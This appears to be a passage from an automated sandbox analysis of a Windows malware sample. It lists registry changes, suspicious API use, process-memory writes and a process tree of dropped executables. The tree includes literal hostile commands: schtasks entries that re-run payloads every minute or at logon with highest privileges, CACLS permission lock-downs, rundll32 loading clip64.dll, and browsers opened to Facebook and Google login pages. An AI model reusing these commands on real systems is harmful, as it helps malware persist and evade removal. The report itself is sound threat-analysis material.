\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4244 explorer.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 2824 1cM09WK2.exe 2824 1cM09WK2.exe 2644 msedge.exe 2644 msedge.exe 1976 msedge.exe 1976 msedge.exe 3560 msedge.exe 3560 msedge.exe 5504 identity_helper.exe 5504 identity_helper.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 5512 build.exe 4892 msedge.exe 4892 msedge.exe 4892 msedge.exe 4892 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 2824 1cM09WK2.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeDebugPrivilege 5512 build.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeShutdownPrivilege 4244 explorer.exe Token: SeCreatePagefilePrivilege 4244 explorer.exe Token: SeDebugPrivilege 928 Firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe -
Suspicious use of SendNotifyMessage 47 IoCs
pid Process 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 1976 msedge.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe 4244 explorer.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4324 StartMenuExperienceHost.exe 5868 Process not Found 4244 explorer.exe 4244 explorer.exe 5936 SearchApp.exe 5960 SearchApp.exe 5740 SearchApp.exe 1240 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4272 wrote to memory of 3376 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 83 PID 4272 wrote to memory of 3376 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 83 PID 4272 wrote to memory of 3376 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 83 PID 3376 wrote to memory of 4816 3376 aW7Zx39.exe 84 PID 3376 wrote to memory of 4816 3376 aW7Zx39.exe 84 PID 3376 wrote to memory of 4816 3376 aW7Zx39.exe 84 PID 4816 wrote to memory of 1784 4816 wa2gg67.exe 85 PID 4816 wrote to memory of 1784 4816 wa2gg67.exe 85 PID 4816 wrote to memory of 1784 4816 wa2gg67.exe 85 PID 1784 wrote to memory of 1344 1784 Eq4EP83.exe 86 PID 1784 wrote to memory of 1344 1784 Eq4EP83.exe 86 PID 1784 wrote to memory of 1344 1784 Eq4EP83.exe 86 PID 1344 wrote to memory of 2824 1344 bo2Cz72.exe 87 PID 1344 wrote to memory of 2824 1344 bo2Cz72.exe 87 PID 1344 wrote to memory of 2824 1344 bo2Cz72.exe 87 PID 1344 wrote to memory of 3736 1344 bo2Cz72.exe 93 PID 1344 wrote to memory of 3736 1344 bo2Cz72.exe 93 PID 1344 wrote to memory of 3736 1344 bo2Cz72.exe 93 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 3736 wrote to memory of 5060 3736 2Ut37hz.exe 94 PID 1784 wrote to memory of 3268 1784 Eq4EP83.exe 100 PID 1784 wrote to memory of 3268 1784 Eq4EP83.exe 100 PID 1784 wrote to memory of 3268 1784 Eq4EP83.exe 100 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 3268 wrote to memory of 2592 3268 3vN9813.exe 101 PID 4816 wrote to memory of 848 4816 wa2gg67.exe 104 PID 4816 wrote to memory of 848 4816 wa2gg67.exe 104 PID 4816 wrote to memory of 848 4816 wa2gg67.exe 104 PID 848 wrote to memory of 676 848 4cP498vO.exe 105 PID 848 wrote to memory of 676 848 4cP498vO.exe 105 PID 848 wrote to memory of 676 848 4cP498vO.exe 105 PID 3376 wrote to memory of 4552 3376 aW7Zx39.exe 106 PID 3376 wrote to memory of 4552 3376 aW7Zx39.exe 106 PID 3376 wrote to memory of 4552 3376 aW7Zx39.exe 106 PID 676 wrote to memory of 4024 676 explothe.exe 107 PID 676 wrote to memory of 4024 676 explothe.exe 107 PID 676 wrote to memory of 4024 676 explothe.exe 107 PID 4552 wrote to memory of 1120 4552 5Kn9WK9.exe 109 PID 4552 wrote to memory of 1120 4552 5Kn9WK9.exe 109 PID 4552 wrote to memory of 1120 4552 5Kn9WK9.exe 109 PID 676 wrote to memory of 2812 676 explothe.exe 110 PID 676 wrote to memory of 2812 676 explothe.exe 110 PID 676 wrote to memory of 2812 676 explothe.exe 110 PID 4272 wrote to memory of 1600 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 112 PID 4272 wrote to memory of 1600 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 112 PID 4272 wrote to memory of 1600 4272 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe 112 PID 2812 wrote to memory of 4296 2812 cmd.exe 114 PID 2812 wrote to memory of 4296 2812 cmd.exe 114 PID 2812 wrote to memory of 4296 2812 cmd.exe 114 PID 2812 wrote to memory of 212 2812 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe"C:\Users\Admin\AppData\Local\Temp\44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aW7Zx39.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aW7Zx39.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\wa2gg67.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\wa2gg67.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Eq4EP83.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Eq4EP83.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bo2Cz72.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bo2Cz72.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1cM09WK2.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1cM09WK2.exe6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Ut37hz.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Ut37hz.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 5408⤵
- Program crash
PID:776
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 5807⤵
- Program crash
PID:4468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3vN9813.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3vN9813.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 6006⤵
- Program crash
PID:540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4cP498vO.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4cP498vO.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F6⤵
- Creates scheduled task(s)
PID:4024
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4296
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"7⤵PID:212
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E7⤵PID:1644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2980
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"7⤵PID:368
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E7⤵PID:3228
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:5448
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Kn9WK9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Kn9WK9.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:1120 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legota.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe" /F5⤵
- Creates scheduled task(s)
PID:3068
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legota.exe" /P "Admin:N"&&CACLS "legota.exe" /P "Admin:R" /E&&echo Y|CACLS "..\cb378487cf" /P "Admin:N"&&CACLS "..\cb378487cf" /P "Admin:R" /E&&Exit5⤵PID:4176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:1636
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legota.exe" /P "Admin:N"6⤵PID:4904
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legota.exe" /P "Admin:R" /E6⤵PID:808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:4068
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb378487cf" /P "Admin:N"6⤵PID:2376
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb378487cf" /P "Admin:R" /E6⤵PID:2448
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000096151\build.exe"C:\Users\Admin\AppData\Local\Temp\1000096151\build.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1644 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4244
-
-
C:\Users\Admin\AppData\Local\Temp\1000096151\build.exe"C:\Users\Admin\AppData\Local\Temp\1000096151\build.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5512 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Firefox" /tr '"C:\Users\Admin\AppData\Roaming\Firefox.exe"' & exit7⤵PID:5912
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Firefox" /tr '"C:\Users\Admin\AppData\Roaming\Firefox.exe"'8⤵
- Creates scheduled task(s)
PID:2348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp53B9.tmp.bat""7⤵PID:5944
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:6116
-
-
C:\Users\Admin\AppData\Roaming\Firefox.exe"C:\Users\Admin\AppData\Roaming\Firefox.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5704 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"9⤵PID:5856
-
-
C:\Users\Admin\AppData\Roaming\Firefox.exe"C:\Users\Admin\AppData\Roaming\Firefox.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main5⤵
- Loads dropped DLL
PID:5656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6na3Oy45.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6na3Oy45.exe2⤵
- Executes dropped EXE
PID:1600 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1D47.tmp\1D48.tmp\1D49.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6na3Oy45.exe"3⤵PID:1520
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login4⤵PID:3944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffec1ff46f8,0x7ffec1ff4708,0x7ffec1ff47185⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,17550865818991536941,13971023322392652617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,17550865818991536941,13971023322392652617,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:25⤵PID:2348
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1976 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec1ff46f8,0x7ffec1ff4708,0x7ffec1ff47185⤵PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:25⤵PID:2152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:15⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:15⤵PID:1324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:85⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:15⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:15⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:15⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:15⤵PID:1220
-
-
